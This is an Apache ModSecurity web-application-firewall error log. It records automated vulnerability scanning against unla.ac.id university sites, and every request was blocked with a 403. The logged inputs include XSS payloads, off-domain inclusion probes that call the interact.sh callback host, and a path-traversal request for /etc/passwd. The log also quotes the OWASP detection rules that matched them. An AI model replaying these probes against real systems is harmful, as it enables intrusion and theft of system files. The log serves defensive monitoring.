[Tue Aug 29 11:53:02.746739 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:is2sim. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:is2sim: \\x22zlo onerror=alert(1) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/php/device_graph_page.php"] [unique_id "ZO15rsCo-f0AAAoLfPcAAAAG"]
[Tue Aug 29 11:53:03.952415 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/wp-json/anycomment/v1/auth/wordpress"] [unique_id "ZO15r8Co-f0AAAoXJtsAAAAP"]
[Tue Aug 29 11:53:04.005443 2023] [:error] [pid 2599] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-json/anycomment/v1/auth/wordpress"] [unique_id "ZO15sMCo-f0AAAonhoQAAAAg"]
[Tue Aug 29 11:53:04.030189 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/wp-json/anycomment/v1/auth/wordpress"] [unique_id "ZO15sMCo-f0AAAot8LUAAAAn"]
[Tue Aug 29 11:53:04.064363 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/wp-json/anycomment/v1/auth/wordpress"] [unique_id "ZO15sMCo-f0AAAhoHV4AAAAl"]
[Tue Aug 29 11:53:04.080934 2023] [:error] [pid 2599] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/wp-json/anycomment/v1/auth/wordpress"] [unique_id "ZO15sMCo-f0AAAonhoUAAAAg"]
[Tue Aug 29 11:53:04.447840 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:is2sim. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:is2sim: \\x22zlo onerror=alert(1) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/php/device_graph_page.php"] [unique_id "ZO15sMCo-f0AAAoesKkAAAAV"]
[Tue Aug 29 11:53:04.489037 2023] [:error] [pid 2595] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/awstats/awredir.pl"] [unique_id "ZO15sMCo-f0AAAojan4AAAAb"]
[Tue Aug 29 11:53:04.759799 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0<script found within ARGS:version: 7.5.0<script>confirm(2Ue0IIxPe0GnIO9Ehzy5hFS4kkT)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/rewe/prod/web/rewe_go_check.php"] [unique_id "ZO15sMCo-f0AAAot8LgAAAAn"]
[Tue Aug 29 11:53:04.777011 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0<script found within ARGS:version: 7.5.0<script>confirm(2Ue0IIxPe0GnIO9Ehzy5hFS4kkT)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/rewe/prod/web/rewe_go_check.php"] [unique_id "ZO15sMCo-f0AAAoesKoAAAAV"]
[Tue Aug 29 11:53:04.777532 2023] [:error] [pid 2595] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0<script found within ARGS:version: 7.5.0<script>confirm(2Ue0IIxPe0GnIO9Ehzy5hFS4kkT)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/rewe/prod/web/rewe_go_check.php"] [unique_id "ZO15sMCo-f0AAAojan8AAAAb"]
[Tue Aug 29 11:53:04.780803 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0<script found within ARGS:version: 7.5.0<script>confirm(2Ue0IIxPe0GnIO9Ehzy5hFS4kkT)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/rewe/prod/web/rewe_go_check.php"] [unique_id "ZO15sMCo-f0AAAoqbOkAAAAj"]
[Tue Aug 29 11:53:04.807250 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh?a=https://interact.sh found within TX:1: interact.sh?a=https://interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/wp-json/anycomment/v1/auth/wordpress"] [unique_id "ZO15sMCo-f0AAAlUlz4AAAA0"]
[Tue Aug 29 11:53:04.872631 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/awstats/awredir.pl"] [unique_id "ZO15sMCo-f0AAAor7ogAAAAk"]
[Tue Aug 29 11:53:04.878674 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0<script found within ARGS:version: 7.5.0<script>confirm(2Ue0IIxPe0GnIO9Ehzy5hFS4kkT)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/rewe/prod/web/rewe_go_check.php"] [unique_id "ZO15sMCo-f0AAAoW7MgAAAAJ"]
[Tue Aug 29 11:53:04.908300 2023] [:error] [pid 2599] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh?a=https://interact.sh found within TX:1: interact.sh?a=https://interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/wp-json/anycomment/v1/auth/wordpress"] [unique_id "ZO15sMCo-f0AAAonhocAAAAg"]
[Tue Aug 29 11:53:04.909377 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh?a=https://interact.sh found within TX:1: interact.sh?a=https://interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/wp-json/anycomment/v1/auth/wordpress"] [unique_id "ZO15sMCo-f0AAAfWOUMAAAAL"]
[Tue Aug 29 11:53:04.909513 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh?a=https://interact.sh found within TX:1: interact.sh?a=https://interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-json/anycomment/v1/auth/wordpress"] [unique_id "ZO15sMCo-f0AAAot8LoAAAAn"]
[Tue Aug 29 11:53:05.068476 2023] [:error] [pid 2599] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh?a=https://interact.sh found within TX:1: interact.sh?a=https://interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/wp-json/anycomment/v1/auth/wordpress"] [unique_id "ZO15scCo-f0AAAonhogAAAAg"]
[Tue Aug 29 11:53:05.727283 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0<script found within ARGS:version: 7.5.0<script>confirm(2Ue0IIxPe0GnIO9Ehzy5hFS4kkT)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/rewe/prod/web/rewe_go_check.php"] [unique_id "ZO15scCo-f0AAAfWOUQAAAAL"]
[Tue Aug 29 11:53:06.050772 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15ssCo-f0AAAoLfP0AAAAG"]
[Tue Aug 29 11:53:06.053814 2023] [:error] [pid 2598] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15ssCo-f0AAAoml08AAAAf"]
[Tue Aug 29 11:53:06.053980 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15ssCo-f0AAAoW7MsAAAAJ"]
[Tue Aug 29 11:53:06.054180 2023] [:error] [pid 2607] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15ssCo-f0AAAov7fYAAAAH"]
[Tue Aug 29 11:53:06.119612 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/wp-json/anycomment/v1/auth/wordpress"] [unique_id "ZO15scCo-f0AAAoT7TsAAAAD"]
[Tue Aug 29 11:53:06.662830 2023] [:error] [pid 2607] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15ssCo-f0AAAov7fgAAAAH"]
[Tue Aug 29 11:53:06.665259 2023] [:error] [pid 2595] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15ssCo-f0AAAojaoMAAAAb"]
[Tue Aug 29 11:53:06.675734 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh?a=https://interact.sh found within TX:1: interact.sh?a=https://interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/wp-json/anycomment/v1/auth/wordpress"] [unique_id "ZO15ssCo-f0AAAofm4oAAAAX"]
[Tue Aug 29 11:53:07.653559 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:profile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:profile: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/magmi/web/magmi.php"] [unique_id "ZO15s8Co-f0AAAfWOUcAAAAL"]
